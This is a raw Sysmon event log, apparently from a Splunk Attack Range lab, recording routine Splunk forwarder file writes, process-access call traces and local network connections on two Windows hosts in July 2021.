23542300x80000000000000001051869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:28.091{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50224E682CE540C3D7C84FDA153C6094,SHA256=88A36CF6301702D374E30A0C7CEA00407D67C6F6055E45B331B6A3A568E81E13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.359{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C97C5F9FBDFA425F08137179060CC8FE,SHA256=D1574A961A5241B4839CB3582B7EC9BB952BD97CF6BD3D0A230E72DF578CEFCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=022EE631D13E03E3E0B6A65244A6E37B,SHA256=BAE1F2F2A5324F5BE1308507E66CF27A9730B724DD45B2FAF83172440528D29B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:29.389{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2832534291EAB6DE5DFFB5D550A19499,SHA256=8EC9826EE2A594F1A73E359E173BF3631491C7D62F3AEC5175C9966322C6FBF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:29.139{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC2C6F326D93C419E9696603BBE8025,SHA256=97D71B731B34F6420FFA469FCCD6AE64E6757B26724A1165A39EEA33BA95E8B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:29.106{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7427C864B499C842ED63A10D6888C4B5,SHA256=8F6D7D662A42CD516BC4BCA76546B51F765D891FF31369D41895D34098BA4A5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:29.319{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57358-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:30.171{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABBB02D7F48664F8534B799756670E2A,SHA256=F164D1AE43D9E14DFFA7E11B6CD33309A70EBDFC2F37383A64F5E5D2ACE976FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:22.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51134-false10.0.1.12-8000- 23542300x80000000000000001051871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:30.121{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F444E19FF0DF03C26436BFD192F7A85A,SHA256=26E85A82CC7C15C825E9EF8C8951C911CEC3AF7EA013C6BAD0FEC4ABC46527E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:30.155{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9550E5D8EC5D50B0221832A90B88DADB,SHA256=998AF4EF0D1FEF051D35DC86CE825BE0F7B95900CE296E85251287389365FB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:31.138{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EDAC143111F35DEDAC828E6520A07B7,SHA256=462964A7EB67ECB74554D2C4C0B661C44734CD9D308C7C9E54308E9A32942D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:31.171{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDBC15FF40772A3D4C88121483A1AA85,SHA256=8D2637FFFD3270AED8F73D764E47390E84464DFA18565EB0330CD0663E4F4CB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:32.157{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EE128764A0C00AE4BAD7DD4F55403D2,SHA256=895D9680A292D08AA39113539018C3349DB1AAEEBDC5BA49BA8E32CDA741509B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:32.218{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C521AC9098658E2FD61425C4A63DE141,SHA256=89C71B19603884E145FA0ED7BDD31FBEBD07F7EC5A7AC414D969C03948947284,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:33.356{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:33.172{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=195D1049FE36734B95BA31B01C3CA140,SHA256=F0743CF9F68B37EEA4BF1A5995E1320BF973B8151A0F29DA32C3DEC01D2BEF3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:33.218{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD543842116C7DD561E0FA3BCD3DEEDA,SHA256=78AB92E96A541D20DB8735F56FA559F9B0D7737D816C941183FC1ED86CE77EC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:34.233{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D50035EAA2D6B2871BCBC576D530B60E,SHA256=A9AEF221EF33ACCD5888D5F8726723076D3968A7D3BA5C88D1B518454CA7DA4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:34.187{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE73900914760DC00A23C8988A669E41,SHA256=0D91AA350FA046E8551D4F3D53BA306A7162228A04C3F20BD8EECB594D2560D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:35.202{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49FDF1C54A333BB057B3E9657A8C306E,SHA256=3331C159CF5BF0833C478AA8095D46419573961EF82B0D02AC1A1B75E171186B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:35.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1580C22A7DCB910B61D324CAC7BBA0AD,SHA256=5B501671BD57375693574D079E6609416FE02CB77D905E998351A5A30C557E33,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:28.653{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51135-false10.0.1.12-8000- 23542300x80000000000000001051879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:36.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0B48DA87E158637FDD235E8E77B5A4,SHA256=CE1AE8C16B396310814DF170D565BB466E8FDB63053BB8BDB6EE56408EFCE9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:36.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08D54D1D31B3843211F32F6FDE28C203,SHA256=474C4A3CE2D4E2F5654BBC46157273BE4943BB6216B54353D969C69EF454D985,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:37.253{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A641D9450127C57043FEB72C43A0B4E,SHA256=978631EB7D72C758E4F76666562DEFD6BB83AD1D277862147BD187FE9114F4F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:35.213{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 